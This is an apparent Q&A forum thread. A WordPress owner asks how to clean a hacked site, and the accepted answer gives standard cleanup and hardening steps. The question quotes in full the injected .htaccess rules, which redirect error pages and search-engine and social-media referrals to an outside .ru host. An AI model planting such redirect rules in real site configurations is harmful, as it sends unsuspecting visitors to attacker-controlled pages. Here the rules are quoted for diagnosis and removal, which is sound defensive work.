# Trying to recover sites from a .htaccess redirect badware on Wordpress

Tags: wordpress, .htaccess, malware

Forgive me if this is a noob question, but I'm honestly stumped.

My site, hosted on Wordpress, has been blacklisted because of some badware.  So far, I've tried unmaskparasites.com, google webmaster tools, and sucuri sitecheck.  I've narrowed down (what I think is) most of the problem to some condition redirects in the .htaccess.  This is what I found:

```
ErrorDocument 400 http://securesoftconnection.ru/aposte/index.php

ErrorDocument 401 http://securesoftconnection.ru/aposte/index.php

ErrorDocument 403 http://securesoftconnection.ru/aposte/index.php

ErrorDocument 404 http://securesoftconnection.ru/aposte/index.php

ErrorDocument 500 http://securesoftconnection.ru/aposte/index.php

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond % {HTTP_REFERER} .*google.* [OR]

RewriteCond % {HTTP_REFERER} .*ask.* [OR]

RewriteCond % {HTTP_REFERER} .*yahoo.* [OR]

RewriteCond % {HTTP_REFERER} .*baidu.* [OR]

RewriteCond % {HTTP_REFERER} .*youtube.* [OR]

RewriteCond % {HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond % {HTTP_REFERER} .*qq.* [OR]

RewriteCond % {HTTP_REFERER} .*excite.* [OR]

RewriteCond % {HTTP_REFERER} .*altavista.* [OR]

RewriteCond % {HTTP_REFERER} .*msn.* [OR]

RewriteCond % {HTTP_REFERER} .*netscape.* [OR]

RewriteCond % {HTTP_REFERER} .*aol.* [OR]

RewriteCond % {HTTP_REFERER} .*hotbot.* [OR]

RewriteCond % {HTTP_REFERER} .*goto.* [OR]

RewriteCond % {HTTP_REFERER} .*infoseek.* [OR]

RewriteCond % {HTTP_REFERER} .*mamma.* [OR]

RewriteCond % {HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond % {HTTP_REFERER} .*lycos.* [OR]

RewriteCond % {HTTP_REFERER} .*search.* [OR]

RewriteCond % {HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond % {HTTP_REFERER} .*bing.* [OR]

RewriteCond % {HTTP_REFERER} .*dogpile.* [OR]

RewriteCond % {HTTP_REFERER} .*facebook.* [OR]

RewriteCond % {HTTP_REFERER} .*twitter.* [OR]

RewriteCond % {HTTP_REFERER} .*blog.* [OR]

RewriteCond % {HTTP_REFERER} .*live.* [OR]

RewriteCond % {HTTP_REFERER} .*myspace.* [OR]

RewriteCond % {HTTP_REFERER} .*mail.* [OR]

RewriteCond % {HTTP_REFERER} .*yandex.* [OR]

RewriteCond % {HTTP_REFERER} .*rambler.* [OR]

RewriteCond % {HTTP_REFERER} .*ya.* [OR]

RewriteCond % {HTTP_REFERER} .*aport.* [OR]

RewriteCond % {HTTP_REFERER} .*linkedin.* [OR]

RewriteCond % {HTTP_REFERER} .*flickr.*

RewriteRule ^ (.*)$ http: //securesoftconnection.ru/aposte/index.php [R=301,L]

</IfModule>
```

So, I've obviously gathered that this is not cool.  I tried editing the .htaccess to the standard wordpress format:

```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```

But it didn't work.  Is there a better way to fix this?  Or is just not worth it?  I don't know much about .htaccess, so I'm kind of at a loss.  I'm also now having trouble uploading the new .htaccess file.

Any help you have about resetting a wordpress .htaccess file, getting rid of badware, or anything else that I might not even know about yet, I'd really appreciate it.

Comment: Also, I looked at the files in my server and their last modified date to see if I could find any other corrupt files that way.  Is that useful or are there ways around that?

Answer (score 1, accepted):

Delete .htaccess and then reset permalinks in WP to regenerate .htaccess with the correct rewrite block.

And see [FAQ: My site was hacked « WordPress Codex](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [How to completely clean your hacked wordpress installation](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) and [How to find a backdoor in a hacked WordPress](http://ottopress.com/2009/hacked-wordpress-backdoors/) and [Hardening WordPress « WordPress Codex.](http://codex.wordpress.org/Hardening_WordPress) Tell your host. Change all passswords. Scan your own PC for spyware.